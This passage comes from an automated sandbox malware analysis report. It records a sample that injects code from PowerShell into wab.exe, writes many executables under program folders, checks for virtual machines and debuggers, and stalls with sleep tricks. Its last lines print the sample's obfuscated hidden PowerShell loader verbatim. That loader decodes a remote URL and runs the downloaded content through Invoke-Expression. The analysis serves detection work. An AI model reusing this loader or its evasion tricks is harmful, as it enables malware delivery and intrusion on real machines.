Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXE
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXE Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exe Jump to dropped file
Source: C:\Program Files (x86)\Windows Mail\wab.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2004 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7284 Thread sleep count: 6060 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7272 Thread sleep count: 3771 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: wab.exe, 0000000A.00000002.2744457018.00000000080D4000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2744457018.0000000008078000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000005.00000002.2263492849.000000000700D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllv4
Source: powershell.exe, 00000002.00000002.2438023736.000001CB1A00D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: -b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: powershell.exe, 00000002.00000002.2622804290.000001CB342CD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_0098D8B8 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk, 5_2_0098D8B8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi64_7152.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7152, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7236, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe File created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exe Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: D3FC18 Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini 
,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.m Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t" Jump to behavior
